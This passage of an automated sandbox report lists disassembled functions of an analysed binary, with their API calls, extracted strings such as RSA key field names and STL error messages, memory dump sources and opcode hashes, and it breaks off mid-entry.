                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RS:h
                                                                                          • API String ID: 4225690600-3891202347
                                                                                          • Opcode ID: fa8eb19020fa8fa827918e6b3c57201c7ac2651f0ad79109da24107518f1c9b9
                                                                                          • Instruction ID: 463a3f82bfcd7022eb0b9f6cbb898139b70206aa330628d405fe04918fe3abf1
                                                                                          • Opcode Fuzzy Hash: fa8eb19020fa8fa827918e6b3c57201c7ac2651f0ad79109da24107518f1c9b9
                                                                                          • Instruction Fuzzy Hash: BD314B70E016099FEB10CFA9CC80B6EB7FAAF89200F208596E558EB255C771DA81CF50
                                                                                          Function 6D020237 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RS3g
                                                                                          • API String ID: 4225690600-2794631155
                                                                                          • Opcode ID: baaf95ec3722bc6aa900360c7d1a69234a4b33ea703c6278f3474275c04034ff
                                                                                          • Instruction ID: cec9403ee5b197a6e8b6809e88075afc68a1a0013a2ffee4dde45e5c9c732043
                                                                                          • Opcode Fuzzy Hash: baaf95ec3722bc6aa900360c7d1a69234a4b33ea703c6278f3474275c04034ff
                                                                                          • Instruction Fuzzy Hash: CE315C70E056099FDB10CFA9CD80B6EB7F9AF89200F608696E558EB251CB71DA41CF50
                                                                                          Function 6D05C760 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • type_info::operator!=.LIBCMT ref: 6D05C7EB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: type_info::operator!=
                                                                                          • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
                                                                                          • API String ID: 2241493438-339133643
                                                                                          • Opcode ID: f77391c9f5ccabf3dd1551f58dcc3e58ca447da3de187f2887f3bc026a08105e
                                                                                          • Instruction ID: 8493e9e274cf0d995675bc5264b761ab06783e9261ebf9e375f2a302a8d7d207
                                                                                          • Opcode Fuzzy Hash: f77391c9f5ccabf3dd1551f58dcc3e58ca447da3de187f2887f3bc026a08105e
                                                                                          • Instruction Fuzzy Hash: 4E31A1B0A183459ED7009F7CCA4575ABBF1AFC5204F014A6EF9489B361EB70D858CB83
                                                                                          Function 6D020457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223B3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223C3
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223D6
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223E9
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D0223FC
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D02240F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArrayDestroySafe
                                                                                          • String ID: RS%e
                                                                                          • API String ID: 4225690600-1409579784
                                                                                          • Opcode ID: 734beccb21f6766787dc7cae065449a62f4d4faac041286b03942d688f7b655a
                                                                                          • Instruction ID: 115e782ce2a0ded9f889c317c7cc4d5a58907b9199219c00eaee8a5f204814db
                                                                                          • Opcode Fuzzy Hash: 734beccb21f6766787dc7cae065449a62f4d4faac041286b03942d688f7b655a
                                                                                          • Instruction Fuzzy Hash: 39314B70E016189FEB10CFA9CC80BADB7FAAF89300F60859AE558EB251C771DA408F50
                                                                                          Function 6D01AA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit
                                                                                          • String ID:
                                                                                          • API String ID: 2610073882-0
                                                                                          • Opcode ID: 89f8b3f4b40b1a0e2c0d33886e8b185396aa9e574f5306c8a6d23b5db97d78a6
                                                                                          • Instruction ID: 0e5ddd27d3688bd6a59981e39819e6a1eeb5e5e089f4937a8b208e5fe1b1e07a
                                                                                          • Opcode Fuzzy Hash: 89f8b3f4b40b1a0e2c0d33886e8b185396aa9e574f5306c8a6d23b5db97d78a6
                                                                                          • Instruction Fuzzy Hash: 0BC15A716087419FD300DF98C880E6ABBE6FFC8304F248A5DF5958B265D731E84ACB92
                                                                                          Function 6D019D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D019DEB
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D019DFB
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D019E29
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D019F25
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D019FE5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                                                          • String ID: @
                                                                                          • API String ID: 3214203402-2766056989
                                                                                          • Opcode ID: c44104399c85a9ea07f27ce636f27913392d2385680f9a5aebf3df26344ff71c
                                                                                          • Instruction ID: c82e4597864167146d3e0ef2c441a56ff70df8b8ab13002fbb91bb3b5fccc951
                                                                                          • Opcode Fuzzy Hash: c44104399c85a9ea07f27ce636f27913392d2385680f9a5aebf3df26344ff71c
                                                                                          • Instruction Fuzzy Hash: 27D15B71D0824ADFEB00DFE8C884AADB7F6BF49304F64816DE515AB254D731AA46CB90
                                                                                          Function 6D01B300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6D01B3EB
                                                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6D01B3FB
                                                                                          • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6D01B429
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D01B525
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D01B5E5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                                                          • String ID: @
                                                                                          • API String ID: 3214203402-2766056989
                                                                                          • Opcode ID: a2912ccc27e67239d3b0a403dda39e78501cfa5ff61cb6231134219b8cfd6a91
                                                                                          • Instruction ID: 685e8d06d1c56ee0bc0343b279d96f4cb9f2edc7f19c1b001190f20b901e86ff
                                                                                          • Opcode Fuzzy Hash: a2912ccc27e67239d3b0a403dda39e78501cfa5ff61cb6231134219b8cfd6a91
                                                                                          • Instruction Fuzzy Hash: 35D15A71E0825A8FEB00DFE8C884BADBBF6BF49304F64815DE515AB354D734AA45CB90
                                                                                          Function 6D041580 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 277COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D0416B2
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D04180A
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          Strings
                                                                                          • exceeds the maximum of , xrefs: 6D04173F
                                                                                          • : message length of , xrefs: 6D04170D
                                                                                          • for this public key, xrefs: 6D041771
                                                                                          • : this key is too short to encrypt any messages, xrefs: 6D04162A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
                                                                                          • String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
                                                                                          • API String ID: 3807434085-412673420
                                                                                          • Opcode ID: 725bc88466333ef128fec634a7474e490e76b85d0908e2a5649e14508e0f81cd
                                                                                          • Instruction ID: 840707e1ed13963aa0105a53cfa50e1364573bba2106a785b6cbba072f87ed20
                                                                                          • Opcode Fuzzy Hash: 725bc88466333ef128fec634a7474e490e76b85d0908e2a5649e14508e0f81cd
                                                                                          • Instruction Fuzzy Hash: 7DB14E7150C380AFE320DB69D890F9BBBE9AFD9314F05891DE59D83251DB70A905CBA3
                                                                                          Function 6D0613A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D0613BE
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D061431
                                                                                          • _memmove.LIBCMT ref: 6D061456
                                                                                          • _memmove.LIBCMT ref: 6D061493
                                                                                          • _memmove.LIBCMT ref: 6D0614B0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: deque<T> too long
                                                                                          • API String ID: 4034224661-309773918
                                                                                          • Opcode ID: b6b5fb2fabc54f7aefa0626a90e9a3e0d263aa96e963fa18528e161fb0fd7b1c
                                                                                          • Instruction ID: f204976206d328e0fc6d6d28579ad10cdb6b2022be33959a4b77e2d8338e4e62
                                                                                          • Opcode Fuzzy Hash: b6b5fb2fabc54f7aefa0626a90e9a3e0d263aa96e963fa18528e161fb0fd7b1c
                                                                                          • Instruction Fuzzy Hash: 33410672A042454BE704CF68DC81B6BB7E6EFC4614F0A862CE909D7749EA34ED05C7B2
                                                                                          Function 6D061250 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D06126E
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          • _memmove.LIBCMT ref: 6D0612E0
                                                                                          • _memmove.LIBCMT ref: 6D061305
                                                                                          • _memmove.LIBCMT ref: 6D061342
                                                                                          • _memmove.LIBCMT ref: 6D06135F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: deque<T> too long
                                                                                          • API String ID: 4034224661-309773918
                                                                                          • Opcode ID: c38bd93cf83285d96e22f2fa60bc6bc5334589badfba1564c591d34d1dd3197f
                                                                                          • Instruction ID: 0ac30caf419e4daf28b8269760a57a0d9313d4c773c2ad0fc6deebde25892c71
                                                                                          • Opcode Fuzzy Hash: c38bd93cf83285d96e22f2fa60bc6bc5334589badfba1564c591d34d1dd3197f
                                                                                          • Instruction Fuzzy Hash: 25411772A042515BE704CF68DC8076BB7E6EFC4614F09862CE909D7745FA34ED0587B2
                                                                                          Function 6D004D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004DA9
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D06913A
                                                                                            • Part of subcall function 6D069125: __CxxThrowException@8.LIBCMT ref: 6D06914F
                                                                                            • Part of subcall function 6D069125: std::exception::exception.LIBCMT ref: 6D069160
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004DCA
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004DE5
                                                                                          • _memmove.LIBCMT ref: 6D004E4D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                                                                          • String ID: invalid string position$string too long
                                                                                          • API String ID: 443534600-4289949731
                                                                                          • Opcode ID: 9167e4015e1f9ab875e32e6e48067d344a6f432e88e8b19be58b513db84d36ec
                                                                                          • Instruction ID: 0241cac39be8620d4e020e7b2bf0a2553eb218fc26db1283fadc369eba4f2dd7
                                                                                          • Opcode Fuzzy Hash: 9167e4015e1f9ab875e32e6e48067d344a6f432e88e8b19be58b513db84d36ec
                                                                                          • Instruction Fuzzy Hash: 6C31D632304251BFF7249E6CE880B6AF3E9AFA8324B21062FE651CB641D760D84083A5
                                                                                          Function 6D0744E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Name::operator+$NameName::
                                                                                          • String ID: throw(
                                                                                          • API String ID: 168861036-3159766648
                                                                                          • Opcode ID: c53c7905e3d6975fda640ff1978571ff353d14d8053fef05d363e32804238439
